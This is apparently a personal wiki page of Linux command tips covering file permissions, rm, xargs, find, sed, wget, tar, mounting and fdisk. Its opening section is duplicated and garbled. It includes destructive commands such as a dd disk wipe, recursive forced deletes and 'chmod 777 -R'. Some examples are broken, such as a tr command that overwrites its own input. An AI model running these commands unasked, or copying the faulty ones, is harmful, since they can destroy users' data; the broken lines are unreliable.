chmod 777 -R folder
use 755
use 755


Read More ... Setting File and Directory Permissions
<h4>Read More ... Setting File and Directory Permissions</h4>


REstart network in fedora
REstart network in fedora
/etc/init.d/network restart
/etc/init.d/network restart
 
Change the owner and group
 
chown bacchas2:psacln -R folder


Create New Directories
<h4>Change the owner and group</h4>


   
  chown bacchas2:psacln -R folder


$ mkdir /tmp/new          Create "new" directory in /tmp
<h4>Create New Directories</h4>
$ mkdir -p /tmp/a/b/c/new Create parent directories as needed for "new"
$ mkdir /tmp/new          Create "new" directory in /tmp
$ mkdir -m 700 /tmp/new2  Create new2 with drwx — — — permissions
$ mkdir -p /tmp/a/b/c/new Create parent directories as needed for "new"
$ mkdir -m 700 /tmp/new2  Create new2 with drwx — — — permissions


   
'''The first mkdir command simply adds the new directory to the existing /tmp directory. The second example creates directories as needed (subdirectories a, b, and c) to create the resulting new directory. The last command adds the -m option to set directory permissions as well.'''
  rm myfile.txt


The first mkdir command simply adds the new directory to the existing /tmp directory. The second example creates directories as needed (subdirectories a, b, and c) to create the resulting new directory. The last command adds the -m option to set directory permissions as well.
rm [-f] [-i] [-R] [-r] [filenames | directory]
* -f    Remove all files (whether write-protected or not) in a directory without prompting the user. In a write-protected directory, however, files are never removed (whatever their permissions are), but no messages are displayed. If the removal of a write-protected directory is attempted, this option will not suppress an error message.
* -i    Interactive. With this option, rm prompts for confirmation before removing any files. It over- rides the -f option and remains in effect even if the standard input is not a terminal.
* -R    Same as -r option.
* -r    Recursively remove directories and subdirectories in the argument list. The directory will be emptied of files and removed. The user is normally prompted for removal of any write-protected files which the directory contains. The write-protected files are removed without prompting, however, if the -f option is used, or if the standard input is not a terminal and the -i option is not used. Symbolic links that are encountered with this option will not be traversed. If the removal of a non-empty, write-protected directory is attempted, the utility will always fail (even if the -f option is used), resulting in an error message.
* filenames    A path of a filename to be removed.


<h4>Examples</h4>


rm myfile.txt
rm myfile.txt


rm [-f] [-i] [-R] [-r] [filenames | directory]
'''Remove the file myfile.txt without prompting the user.'''
-f    Remove all files (whether write-protected or not) in a directory without prompting the user. In a write-protected directory, however, files are never removed (whatever their permissions are), but no messages are displayed. If the removal of a write-protected directory is attempted, this option will not suppress an error message.
-i    Interactive. With this option, rm prompts for confirmation before removing any files. It over- rides the -f option and remains in effect even if the standard input is not a terminal.
-R    Same as -r option.
-r    Recursively remove directories and subdirectories in the argument list. The directory will be emptied of files and removed. The user is normally prompted for removal of any write-protected files which the directory contains. The write-protected files are removed without prompting, however, if the -f option is used, or if the standard input is not a terminal and the -i option is not used. Symbolic links that are encountered with this option will not be traversed. If the removal of a non-empty, write-protected directory is attempted, the utility will always fail (even if the -f option is used), resulting in an error message.
filenames    A path of a filename to be removed.


Examples
rm -r directory


rm myfile.txt
'''Remove a directory, even if files existed in that directory.'''


Remove the file myfile.txt without prompting the user.
<h3>Listing Files</h3>


rm -r directory
'''Although you are probably quite familiar with the ls command, you may not be familiar with many of the useful options for ls that can help you find out a lot about the files on your system. Here are some examples of using ls to display long lists (-l) of files and directories:'''


Remove a directory, even if files existed in that directory.
* $ ls -l      Files and directories in current directory
* $ ls -la    Includes files/directories beginning with dot (.)
* $ ls -lt    Orders files by time recently changed
* $ ls -lu    Orders files by time recently accessed
* $ ls -lS    Orders files by size
* $ ls -li    Lists the inode associated with each file
* $ ls -ln    List numeric user/group IDs, instead of names
* $ ls -lh    List file sizes in human-readable form (K, M, etc.)
* $ ls -lR    List files recursively, from current directory and subdirectories


Listing Files
<h4>When you list files, there are also ways to have different types of files appear differently in the listing:</h4>


Although you are probably quite familiar with the ls command, you may not be familiar with many of the useful options for ls that can help you find out a lot about the files on your system. Here are some examples of using ls to display long lists (-l) of files and directories:
$ ls -F                Add a character to indicate file type
'''myfile-symlink@    config/  memo.txt  pipefile|  script.sh* xpid.socket='''
$ ls --color=always    Show file types as different colors
$ ls -C                Show files listing in columns


$ ls -l      Files and directories in current directory
'''In the -F example, the output shows several different file types. The myfile-symlink@ indicates a symbolic link to a directory, config/ is a regular directory, memo.txt is a regular file (no extra characters), pipefile| is a named pipe (created with mkfifo), script.sh* is an executable file, and xpid.socket= is a socket. The next two examples display different file types in different colors and lists output in columns, respectively.'''
$ ls -la    Includes files/directories beginning with dot (.)
$ ls -lt    Orders files by time recently changed
$ ls -lu    Orders files by time recently accessed
$ ls -lS    Orders files by size
$ ls -li    Lists the inode associated with each file
$ ls -ln    List numeric user/group IDs, instead of names
$ ls -lh    List file sizes in human-readable form (K, M, etc.)
$ ls -lR    List files recursively, from current directory and subdirectories


When you list files, there are also ways to have different types of files appear differently in the listing:
----


$ ls -F                Add a character to indicate file type
myfile-symlink@    config/  memo.txt  pipefile|  script.sh* xpid.socket=
$ ls --color=always    Show file types as different colors
$ ls -C                Show files listing in columns
In the -F example, the output shows several different file types. The myfile-symlink@ indicates a symbolic link to a directory, config/ is a regular directory, memo.txt is a regular file (no extra characters), pipefile| is a named pipe (created with mkfifo), script.sh* is an executable file, and xpid.socket= is a socket. The next two examples display different file types in different colors and lists output in columns, respectively.
</pre>
----
==[[#Xargs|Back To Top]]-[[Main_Page| Home]] - [[Ubuntu_Tips|Category]]==
==[[#Xargs|Back To Top]]-[[Main_Page| Home]] - [[Ubuntu_Tips|Category]]==

Latest revision as of 19:05, 15 November 2023

Xargs

Find all jpgs files in a directory and copy them to another dir

find upload/ -type f -name "*.jpg" -print0 | xargs -I '{}' -0 cp '{}' alljpgs/

Read a file.txt and create a directory for each line of the file file.txt contents = (each on a separate line) apple oranges pear

cat file.txt | sort | uniq | xargs -I {} mkdir -p /var/www/fruits/{}
find dir/ -type f -print0 | xargs -0 chmod 755
#print0 is used to make sure the null character will separate them and the -0 make sure xargs uses that null charcter
find . -name "*fruit.txt" -print0 | xargs -0 -I {} cp {} /folder/{}.backup
#Find files in the current directory with fruit in the filename "{}" is the place holder for the filename. Copy the {} to the specified folder
find . -name "*fruit.txt" -depth 1 -print0 | xargs -0 -I {} rm
find . -name "*invoice*" -print0 | xargs -0 grep -li 'outwater' | xargs -I {} cp {} /dir/{}
#Find all files with the word invoice then send it to grep to search in the files for the text outwater then copy those files to the dir


Copy all images to external hard-drive

# ls *.jpg | xargs -n1 -i cp {} /external-hard-drive/directory

Search all jpg images in the system and archive it.

# find / -name *.jpg -type f -print | xargs tar -cvzf images.tar.gz

Download all the URLs mentioned in the url-list.txt file

# cat url-list.txt | xargs wget –c

Tree Command

apt install tree

tree -a 
# list dir tree including hidden files
tree -f
#To list the directory contents with the full path prefix for each sub-directory and file, use the -f as shown
tree -d
or
tree -df
#You can also instruct tree to only print the subdirectories minus the files in them using the -d option. If used together with the -f option, the tree will print the full directory path as shown
tree -f -L 2
# You can specify the maximum display depth of the directory tree using the -L option. For example, if you want a depth of 2, run the following command.


tree -f -P cata*
# To display only those files that match the wild-card pattern, use the -P flag and specify your pattern. In this example, the command will only list files that match cata*, so files such as Catalina.sh, catalina.bat, etc. will be listed.
tree -f --du
#Another useful option is --du, which reports the size of each sub-directory as the accumulation of sizes of all its files and subdirectories (and their files, and so on).
tree -o filename.txt
#redirect the tree’s output to filename for later analysis using the -o optio

Diff Command

diff -y originalfile.txt revisedfile.txt

Cut Command, Can extract contiguious text from a file. eg charcters 2 - 10 of every line

cut -c 2-10 textfile.txt
Will extract characters 2 through 10 on each line
cut -c 2-10,30-35 filename.txt
will extract 2-10 and 30-35
cut -f 2,6 -d "," filename.csv
-f along with the -d option wil allow you to add a delimiter

TR (translate Function)

replace the , in a text file with a ; then pipe it back to the file
tr ',' ';' < somefile.csv > somefile.csv

Standard Input and Standard Output

Send Sorted file to new file
sort somefile.txt > newfilename.txt
To Append use >> insted of >
Supressing Output
ls -la > /dev/null

How To Change Multiple File Extensions From The Terminal

1. Open a new terminal and create the following directory in you desktop.

cd  /home/oltjano/Desktop

mkdir unixmen_tutorial

2.  cd to unixmen_tutorial and create the following files.

a.txt   b.txt  c.txt

3.  Ok guys it is time for some action. Run the following piece of code in the terminal and see what happens.

for i in *.txt; do echo $i; done

4. The following screenshot shows the result  that you should get in your terminal.

So what we are trying to do here is running a for loop and printing every filename with the .txt in the current directory. Ok, now run the following commands. It is used to strip the extension from a file.

a=a.txt

echo ${a/.txt}

5.  Do you see the following result?

6.  Ok, now run the following piece of code in your terminal. Have the file extensions changed?

for i in *.txt;  do mv "$i" "${i/.txt}".jpg; done

Wget Command

Download a single file

$ wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz

Download and store it with a different name.

$ wget -O taglist.zip http://www.vim.org/scripts/download_script.php?src_id=7701

Download in the Background Using wget -b

For a huge download, put the download in background using wget option -b as shown below.

$ wget -b http://www.openss7.org/repos/tarballs/strx25-0.9.2.1.tar.bz2

Mask User Agent and Display wget like Browser Using wget –user-agent

Some websites can disallow you to download its page by identifying that the user agent is not a browser. So you can mask the user agent by using –user-agent options and show wget like a browser as shown below.

wget --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" URL-TO-DOWNLOAD

Download Multiple Files / URLs Using Wget -i

First, store all the download files or URLs in a text file as:

$ cat > download-file-list.txt

URL1

URL2

URL3

URL4

Next, give the download-file-list.txt as argument to wget using -i option as shown below.

$ wget -i download-file-list.txt

Download a Full Website Using wget –mirror

Following is the command line which you want to execute when you want to download a full website and made available for local viewing.

$ wget --mirror -p --convert-links -P ./LOCAL-DIR WEBSITE-URL

–mirror : turn on options suitable for mirroring.

-p : download all files that are necessary to properly display a given HTML page.

–convert-links : after the download, convert the links in document for local viewing.

-P ./LOCAL-DIR : save all the files and directories to the specified directory.

Reject Certain File Types while Downloading Using wget –reject

You have found a website which is useful, but don’t want to download the images you can specify the following.

$ wget --reject=gif WEBSITE-TO-BE-DOWNLOADED

Download Only Certain File Types Using wget -r -A

You can use this under following situations:

Download all images from a website

Download all videos from a website

Download all PDF files from a website

$ wget -r -A.pdf http://url-to-webpage-with-pdfs/

FTP Download With wget

You can use wget to perform FTP download as shown below.

Anonymous FTP download using Wget

$ wget ftp-url

FTP download using wget with username and password authentication.

$ wget --ftp-user=USERNAME --ftp-password=PASSWORD DOWNLOAD-URL

Move Multiple folders to another directory

mv -v /home/user1/Desktop/folder1/* /var/tmp/

This will move the contents of folder1 to tmp folde

Using Grep and find to search through eml files

Using Grep and Find to search through .eml files for a specific phrase

go to the dir in question

find . -exec grep -ils 'text to find' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

above will find the files and copy them to specified folder

find . -exec grep -ils 'text to find\|more text to find\|even more text' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

Above will find multiple search strings

find . -type f -name ".DS_Store" -exec rm -f {} \;

Above will find Ds files in current dir and subdir and delete them

find . -exec grep -ls 'text to find' /dev/null {} \;
find . -exec grep -H 'text to look for {} \;
find . -exec grep -n 'text to look for' /dev/null {} \;
find . -exec grep -n 'yuly' /dev/null {} \; -print >> /Volumes/RAIDset1/1share/text.txt

list files that contain the name "out"

ls -la | grep out

Find files in a dir with a string. the -i is case insensitive -w is exact word

find dirname | grep -i  string

SED find and replace

sed -i (inplace) s (subsitute) /find/replace/ g (global). You can replce the / with any other delimiter eg | or :. eg. if you want to find text "/mac" then you would use : as the delimiter sed -i 's:/mac:mac:g'

Find and Replace Multiple (add the -e switch

sed -e 's/find/replace/g' -e 's/find/replace/g'

Let us start off simple: Imagine you have a large file ( txt, php, html, anything ) and you want to replace all the words "ugly" with "beautiful"

This is the command:

sed -i 's/ugly/beautiful/g' /home/bruno/old-friends/sue.txt

"sed" edits "-i in place ( on the spot ) and replaces the word "ugly with "beautiful" in the file "/home/bruno/old-friends/sue.txt"

Imagine you have a whole lot of files in a directory and you want the same command to do all those files in one go Remember the find command ? We will combine the two:

$ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g' {} \;

Sure in combination with the find command you can do all kind of nice tricks, even if you don't remember where the files are located !

Additionally I did find a little script on the net for if you often have to find and replace multiple files at once:

#!/bin/bash
     for fl in *.php; do
     mv $fl $fl.old
     sed 's/FINDSTRING/REPLACESTRING/g' $fl.old > $fl
     rm -f $fl.old
     done

just replace the "*.php", "FINDSTRING" and "REPLACESTRING" make it executable and you are set.

I changed a www address in 183 .html files in one go with this little script . . . but note that you have to use "escape-signs" ( \ ) if there are slashes in the text you want to replace, so as an example: 's/www.search.yahoo.com\/images/www.google.com\/linux/g' to change www.search.yahoo.com/images to www.google.com/linux


For the lovers of perl I also found this one:

# perl -e "s/old_string/new_string/g;" -pi.save $(find DirectoryName -type f)

Creating ISO File from a folder

If you want to make an iso file from a directory containing other files and sub-directories via the terminal, you can use the following command:

mkisofs -o image.iso -R /path/to/folder/

If you wish to backup the home folder, use this command:

mkisofs -o image.iso -R $HOME

Mount Windows SMB share on linux

  • apt install cifs-utils
  • mkdir /mnt/share
  • mount.cifs "//192.168.1.1/windows share" /mnt/share -o user=bob
    • use the &quoute when there are spaces in the share name

Mount ftp server as local drive

1. Installation

First install curlftpfs package. On Debian or Ubuntu it would simple as:

apt-get install curlftpfs

2. Mount ftp directory What needs to be done next is to create a mount point:

# mkdir /mnt/my_ftp

next use curlftpfs to mount your remote ftp site. Suppose my access credentials are as follows:

username: ftp-user
password: ftp-pass
host/IP: my-ftp-location.local
the actual curlftpfs mount command would be:
# curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

Caution:

ftp uses unencrypted passwords so anyone can intercept your password without much effort. Therefore use curlftpfs in combination with SSL certificates if your are not mounting some local LAN ftp server.

On Debian you can mount ftp using curlftpfs as a root and this allows only root user to access ftp mount. No other users are allowed since by default only users that mounts has and access to mount directory. When mounting ftp as a non-root user you may get a following error message:

fuse: failed to open /dev/fuse: Permission denied

Rather that changing permissions of /dev/fuse you can allow other users to access ftp mount directory with an curlftpfs's option allow_other. The command will look similar to the one below:

# curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

3. Mount ftp with curlftpfs using /etc/fstab

Since we do not want put any passwords to /etc/fstab file we will first create a /root/.netrc file with a ftp username and password using this format:

machine my-ftp-location.local

login ftp-user password ftp-pass

Now change permissions of this file to 600:

# chmod 600 /root/.netrc

Check uid and gid of your non-root user. This user will have a access to ftp mount directory:

$ id

In the next step add a following line to your /etc/fstab file ( change credentials for your ftp user ):

curlftpfs#my-ftp-location.local /mnt/my_ftp fuse allow_other,uid=1000,gid=1000,umask=0022 0 0

Now mount ftp with:

mount -a

Creating Aliases

2 . You can add more that one commands on a line in terminal if you follow it with a ; (semi-colan) eg cd etc; ls; cd /

will change to the etc dir ls the dir and then cd to root.

 

3. Create a Temorary Alias your cammands. alias foo='cd /etc; ls; cd /'

this will create an alias with the name foo. you can execute foo which will run the command.

- to remove the command: unalias foo

- display commands in an alias: type foo

After shell is closed alias is gone

 

4. Permanent alias: edit the .bashrc file -

nano .bashrc

add your alias to this file. eg. alias foo='echo hello world'

save and close file, then issue command source .bashrc // this will reload the changes in the .bashrc file

For Mac the the .bashrc file is in the Home dir ~ and it's called .bash_profile

Format a drive in bash

Linux refers to hard drives as either "hdx" or "sdx," where x is a letter, starting with a, which represents the order in which the drive was added to or detected by the computer. The "hd" prefix is used for IDE and PATA (formerly just ATA), and the "sd" prefix is used for SCSI, SATA and USB drives. Usually, a number is also put at the end of "hdx" or "sdx" to denote different partitions on the same physical drive, but for the purpose of formatting, you only need to know which letter the drive you want to format is.

4
The examples given in this how-to are for a computer with two IDE hard drives attached as a master and slave. In this, the drives are "hda" and "hdb." You will need to determine the letter of the drive you want to format for your own setup. We will be formatting the drive hdb. For all examples, replace "hdb" with whatever your drive designation is.

5
You can see all the drives attached to your system by typing the command "ls /dev/hd*" or "ls /dev/sd*", depending on which type (IDE, SATA and so forth) the drives are. On the example system, the result of this command looks like "/dev/hda /dev/hda1 /dev/hda2 /dev/hdb /dev/hdb1". Theoperating system is installed on hda, which has two partitions (hda1 and hda2), and there is one partition on hdb and hdb1.

Using fdisk
6
First, you will use the fdisk command to erase any old partitions on the drive and create a new one. Any changes you make using fdisk are only made permanent if you then issue the "w" command before quitting, so feel free to play around a little if you like. If at any time you find yourself stuck, you can quit the program without saving changes by holding the "Ctrl" key and pressing "c."

7
At the command prompt, type "fdisk /dev/hdb", replacing the "hdb" with the letters for your drive. Upon opening, fdisk may give you a couple of warnings, all of which can be ignored. It then gives you a prompt that looks like this: Command (m for help):

8
Enter "p" to see the partition table of the drive. The first line of output from the "p" command will also tell you the size of the drive. This is a good way to double-check that you are working with the correct drive.

9
If there are any partitions already on the drive, they will be listed as the last lines of the "p" command. On our example, this looks like "/dev/hdb1", followed by some information about the partition's size and filesystem.

10
To delete any existing partitions, press "d" and then "Enter." It will ask you which partition number you wish to delete. The number of the partition is the number that follows hdb, so on our example system, we enter 1. If there are multiple partitions, repeat the "d" command for each one. You can always view the partition table again with the "p" command.

11
Once you have deleted all existing partitions on the drive, you are ready to make a new one. Type "n" and hit "Enter." Then press "p" to create a primary partition. It asks you for a partition number; enter "1." Now you are asked which cylinder the partition should start at. The beginning of the drive is the default, so just hit "Enter." Then, you are asked for the last cylinder. The end of the drive is the default, so you can just press "Enter" again.

12
Now you are back at fdisk's command prompt. Use the "p" command to check the partition table. You should now see your new partition at the bottom of the output. In the example, it lists as "/dev/hdb1."

13
You now need to set the filesystem type for your new partition with the "t" command. You are asked for the Hex code of the filesystem you wish to use. We will use the standard Linux ext2 filesystem, which is "83." If you are doing something special and know of a particular filesystem that you need to use, you can press "L" to see all the codes, which are one or two characters made up of the numbers 0 to 9 and the letters a to f.

14
Now just issue the "w" command to write your new partition table and exit fdisk.



Read more: How to Format a Hard Drive in Linux | eHow.com http://www.ehow.com/how_1000631_hard-drive-linux.html#ixzz1teq8yBrz

Wput - uploading file from terminal

wput x ftp://username:password@domain.com/

x could be a directory or filename

example

wput filename.zip ftp://username:password@domain.com/Desktop/filename.zip

List and Mount a Drive

Using mount Get the Information IconsPage/IconGNOMETerminal.png Sometimes devices don't automount, in which case you should try to manually mount it. First, you must know what device we are dealing with and what filesystem it is formatted with. Most flash drives are FAT16 or FAT32 and most external hard disks are NTFS.

sudo fdisk -l

Find your device in the list, it is probably something like /dev/sdb1. For more information about filesystems, seeLinuxFilesystemsExplained.

Create the Mount Point Now we need to create a mount point for the device, let's say we want to call it "external". You can call it whatever you want, just please don't use spaces in the name or it gets a little more complicated - use an underscore to separate words (like "my_external"). Create the mount point:

sudo mkdir /media/external

Mount the Drive IconsPage/example.png We can now mount the drive. Let's say the device is /dev/sdb1, the filesystem is FAT16 or FAT32 (like it is for most USB flash drives), and we want to mount it at /media/external (having already created the mount point):

sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000,gid=100,utf8,dmask=027,fmask=137

The options following the "-o" allow your user to have ownership of the drive, and the masks allow for extra security for file system permissions. If you don't use those extra options you may not be able to read and write the drive with your regular username.

Otherwise if the device is formatted with NTFS, run:

sudo mount -t ntfs-3g /dev/sdb1 /media/external

Unmounting the Drive IconsPage/example.png When you are finished with the device, don't forget to unmount the drive before disconnecting it. Assuming /dev/sdb1 mounted at /media/external, you can either unmount using the device or the mount point:

sudo umount /dev/sdb1

or:

sudo umount /media/external

7 Useful Linux Networking Commands

ifconfig for basic interface and IP configuration


The ifconfig tool (derived from interface configurator) provides a few very basic, but important, functions. It lets you turn network adapters on and off and assign IP address and netmask details. Here are some of the common commands:

View current configuration of network interfaces, including the interface names:

ifconfig

Turn an adapter on (up) or off (down):

ifconfig <network name> <up|down>

Assign an IP address to an adapter:

ifconfig <network name> <ip address>

Assign a second IP address to an adapter:

ifconfig <network name:instance number> <ip address>

Example: ifconfig eth0:0 192.168.1.101

ethtool managages ethernet card settings

Ethtool lets you view and change many different settings for ethernet adapters (which does not include Wi-Fi cards). You can manage many different advanced settings, including tx/rx, checksumming, and wake-on-LAN settings. However, here are more basic commands you might be interested in:

Display the driver information for a specific network adapter, great when checking for software compatibility:

ethtool -i <interface name>

Initiate an adapter-specific action, usually blinking the LED lights on the adapter, to help you identify between multiple adapters or interface names:

ethtool -p <interface name>

Display network statistics:

ethtool -S

Set the connection speed of the adapter in Mbps:

ethtool speed <10|100|1000> 

iwconfig for wireless configuration

The iwconfig tool is like ifconfig and ethtool for wireless cards. You can view and set the basic Wi-Fi network details, such as the SSID, channel, and encryption. There's also many advanced settings you can view and change, including receive sensitivity, RTS/CTS, fragmentation, and retries. Here are some commands you may want to try:

Display the wireless settings of your interfaces, including the interface names you'll need for other commands:

iwconfig

Set the ESSID (Extended Service Set Identifier) or network name:

iwconfig <interface name> essid <network name>

Example: iwconfig <interface name> "my network"

Example: iwconfig <interface name> any

Set the wireless channel of the radio (1-11):

iwconfig <interface name> <channel>

Input a WEP encryption key (WPA/WPA2 isn't supported yet; for this you need wpa_supplicant):

iwconfig eth0 key <key in HEX format>

Only allow the adapter to connect to an AP with the MAC address you specify:

iwconfig <interface name> ap <mac address>

Example: iwconfig eth0 ap 00:60:1D:01:23:45

Set the transmit power of the radio, if supported by the wireless card, in dBm format by default or mW when specified:

iwconfig <interface name> txpower <power level>

Example: iwconfig eth0 txpower 15

Example: iwconfig eth0 txpower 30mW

Accessing a Directory With a Space in The Filename

Eg. Directory name is: " Dir 001"

to Cd into that dir you would enter the command with a "\" :

cd Dir\ 001

Manually Mount A Device in Ubuntu

To manually mount a media device in the virtual directory, you'll need to be logged in as the root user. The basic command for manually mounting a media device is:

mount ‐t type device directory

The type parameter defines the filesystem type the disk was formatted under. There are lots and lots of different filesystem types that Linux recognizes. If you share removable media devices with your Windows PCs, the types you're most likely to run into are:

  • vfat: Windows long filesystem.
  • ntfs: Windows advanced filesystem used in Windows NT, XP, and Vista.
  • iso9660: The standard CD‐ROM filesystem.

Most USB memory sticks and floppies are formatted using the vfat filesystem. If you need to mount a data CD, you'll have to use the iso9660filesystem type. The next two parameters define the location of the device file for the media device and the location in the virtual directory for the mount point. For example, to manually mount the USB memory stick at device /dev/sdb1 at location /media/disk, you'd use the command:

mount ‐t vfat /dev/sdb1 /media/disk

Once a media device is mounted in the virtual directory, the root user will have full access to the device, but access by other users will be restricted. You can control who has access to the device using directory permissions.

‐a Mount all filesystems specified in the /etc/fstab file.

‐f Causes the mount command to simulate mounting a device, but not actually mount it.

‐F When used with the ‐a parameter, mounts all filesystems at the same time.

‐v Verbose mode, explains all the steps required to mount the device.

‐I Don't use any filesystem helper files under /sbin/mount.filesystem.

‐l Add the filesystem labels automatically for ext2, ext3, or XFS filesystems.

‐n Mount the device without registering it in the /etc/mstab mounted device file.

‐p num For encrypted mounting, read the passphrase from the file descriptor num.

‐s Ignore mount options not supported by the filesystem.

‐r Mount the device as read‐only.

‐w Mount the device as read‐write (the default).

‐L label Mount the device with the specified label.

‐U uuid Mount the device with the specified uuid.

‐O When used with the ‐a parameter, limits the set of filesystems applied.

‐o Add specific options to the filesystem . The ‐o option allows you to mount the filesystem with a comma‐separated list of additional options. The popular options to use are:

ro: Mount as read‐only.

rw: Mount as read‐write.

user: Allow an ordinary user to mount the filesystem. check=none: Mount the filesystem without performing an integrity check.

loop: Mount a file.

A popular thing in Linux these days is to distribute a CD as a .iso file. The .iso file is a complete image of the CD in a single file. Most CD‐burning software packages can create a new CD based on the .iso file. A feature of the mount command is that you can mount a .iso file directly to your Linux virtual directory without having to burn it onto a CD. This is accomplished using the ‐o parameter with the loop option:

$ mkdir mnt
$ su
Password:
# mount ‐t iso9660 ‐o loop MEPIS‐KDE4‐LIVE‐DVD_32.iso mnt

Linux Directory Structure

/ The root of the virtual directory. Normally, no files are placed here.
/bin The binary directory, where many GNU user‐level utilities are stored.
/boot The boot directory, where boot files are stored.
/dev The device directory, where Linux creates device nodes.
/etc The system configuration files directory.
/home The home directory, where Linux creates user directories.
/lib The library directory, where system and application library files are stored.
/media The media directory, a common place for mount points used for removable media.
/mnt The mount directory, another common place for mount points used for removable media.
/opt The optional directory, often used to store optional software packages.
/root The root home directory.
/sbin The system binary directory, where many GNU admin‐level utilities are stored.
/tmp The temporary directory, where temporary work files can be created and destroyed.
/usr The user‐installed software directory.
/var The variable directory, for files that change frequently, such as log files

TAR Files

To inzip .bz2 files use:

tar -jxvf filename.tar.bz2

to unzip gz files use:

tar -zxvf filename.tar.gz

Zip Files

zip and unzip

To create a zip file containing dir1, dir2, ... :

zip -r <filename>.zip dir1 dir1 ...

To extract <filename>.zip:

unzip <filename>.zip

In Unix, the name of the tar command is short for tape archiving, the storing of entire file systems onto magnetic tape, which is one use for the command. However, a more common use for tar is to simply combine a few files into a single file, for easy storage and distribution.

To combine multiple files and/or directories into a single file, use the following command:

tar -cvf file.tar inputfile1 inputfile2

Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the f option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The v option tells tar to be verbose, which reports all files as they are added.

To separate an archive created by tar into separate files, at the shell prompt, enter:

tar -xvf file.tar

Compressing and uncompressing tar files

Many modern Unix systems, such as Linux, use GNU tar, a version of tar produced by the Free Software Foundation. If your system uses GNU tar, you can easily use gzip (the GNU file compression program) in conjunction with tar to create compressed archives. To do this, enter:

tar -cvzf file.tar.gz inputfile1 inputfile2

Here, the z option tells tar to zip the archive as it is created. To unzip such a zipped tar file, enter:

tar -xvzf file.tar.gz

Alternatively, if your system does not use GNU tar, but nonetheless does have gzip, you can still create a compressed tar file, via the following command:

tar -cvf - inputfile1 inputfile2 | gzip > file.tar.gz

Note: If gzip isn't available on your system, use the Unix compress command instead. In the example above, replace gzip with compress and change the .gz extension to .Z (the compress command specifically looks for an uppercase Z). You can use other compression programs in this way as well. Just be sure to use the appropriate extension for the compressed file, so you can identify which program to use to decompress the file later.

If you are not using GNU tar, to separate a tar archive that was compressed by gzip, enter:

gunzip -c file.tar.gz | tar -xvf -

Similarly, to separate a tar archive compressed with the Unix compress command, replace gunzip with uncompress .

Lastly, the extensions .tgz and .tar.gz are equivalent; they both signify a tar file zipped with gzip.

Additional information

Keep the following in mind when using the tar command:

The order of the options sometimes matters. Some versions of tar require that the f option be immediately followed by a space and the name of the tar file being created or extracted.

Some versions require a single dash before the option string (e.g., -cvf ). GNU tar does not have either of these limitations.

The tar command has many additional command options available. For more information, consult the manual page. At the shell prompt, enter:

man tar

GNU tar comes with additional documentation, including a tutorial, accessible through the GNU Info interface. You can access this documentation by entering:

info tar Within the Info interface, press  ? (the question mark) for a list of commands

DD Unix Command

dd is a common Unix program whose primary purpose is the low-level copying and conversion of raw data

dd's input is specified using the "if" (input file) option, while most programs simply take the name by itself.

Example use of dd command to create an ISO disk image from a CD-ROM:

dd if=/dev/cdrom of=/home/sam/myCD.iso bs=2048 conv=sync,notrunc

Note that an attempt to copy the entire disk image using cp may omit the final block if it is an unexpected length; dd will always complete the copy if possible.

Using dd to wipe an entire disk with random data:

dd if=/dev/urandom of=/dev/hda

Using dd to duplicate one hard disk partition to another hard disk:

dd if=/dev/sda2 of=/dev/sdb2 bs=4096 conv=notrunc,noerror

Note that notrunc means do not truncate the output file. Noerror means to keep going if there is an error (though a better tool for this would be ddrescue).

To duplicate a disk partition as a disk image file on a different partition

dd if=/dev/sdb2 of=/home/sam/partition.image bs=4096 conv=notrunc,noerror

To duplicate a disk partition as a disk image file on a remote machine over a secure ssh connection:

dd if=/dev/sdb2 | ssh user@host "dd of=/home/user/partition.image"

To duplicate master boot record only

dd if=/dev/sda of=/home/sam/MBR.image bs=446 count=1

To make drive benchmark test and analyze read and write performance

dd if=/dev/zero bs=1024 count=1000000 of=/home/sam/1Gb.file
dd if=/home/sam/1Gb.file bs=64k | dd of=/dev/null

To make a file of 100 random bytes:

dd if=/dev/urandom of=/home/sam/myrandom bs=100 count=1

To convert a file to uppercase:

dd if=filename of=filename conv=ucase

To search the system memory:

dd if=/dev/mem | hexdump -C | grep 'some-string-of-words-in-the-file-you-forgot-to-save-before-you-hit-the-close-button'

Image a partition to another machine:

On source machine:

dd if=/dev/hda bs=16065b | netcat < targethost-IP > 1234

On target machine:

netcat -l -p 1234 | dd of=/dev/hdc bs=16065b

Everybody has mentioned the first obvious fix: raise your blocksize from the default 512 bytes. The second fix addresses the problem that with a single dd, you are either reading or writing. If you pipe the first dd into a second one, it'll let you run at the max speed of the slowest device.

Ubuntu Text Editors and Other commands for Manipulating Text

Nano Text Editor

$ nano memo.txt Open memo.txt for editing
$ nano -B memo.txt When saving, back up previous to ~.filename
$ nano -m memo.txt Turn on mouse to move cursor (if supported)
$ nano +83 memo.txt Begin editing on line 83

The -m command-line option turns on support for a mouse. You can use the mouse to select a position in the text, and the cursor moves to that position. After the first click, though, nano uses the mouse to mark a block of text, which may not be what you are expecting.

Listing, Sorting, and Changing Text

Instead of just editing a single text file, you can use a variety of Linux commands to display, search, and manipulate the contents of one or more text files at a time. Listing Text Files The most basic method to display the contents of a text file is with the cat command. The cat command concatenates (in other words, outputs as a string of characters) the contents of a text file to your display (by default). You can then use different shell metacharacters to direct the contents of that file in different ways. For example:

$ cat myfile.txt Send entire file to the screen
$ cat myfile.txt > copy.txt Direct file contents to another file
$ cat myfile.txt >> myotherfile.txt Append file contents to another file
$ cat -s myfile.txt Display consecutive blank lines as one
$ cat -n myfile.txt Show line numbers with output
$ cat -b myfile.txt Show line numbers only on non-blank lines

However, if your block of text is more than a few lines long, using cat by itself becomes impractical. That's when you need better tools to look at the beginning or the end, or page through the entire text.

To view the top of a file, use head:

$ head myfile.txt
$ cat myfile.txt | head

Both of these command lines use the head command to output the top 10 lines of the file. You can specify the line count as a parameter to display any number of lines from the beginning of a file. For example:

$ head -n 50 myfile.txt Show the first 50 lines of a file
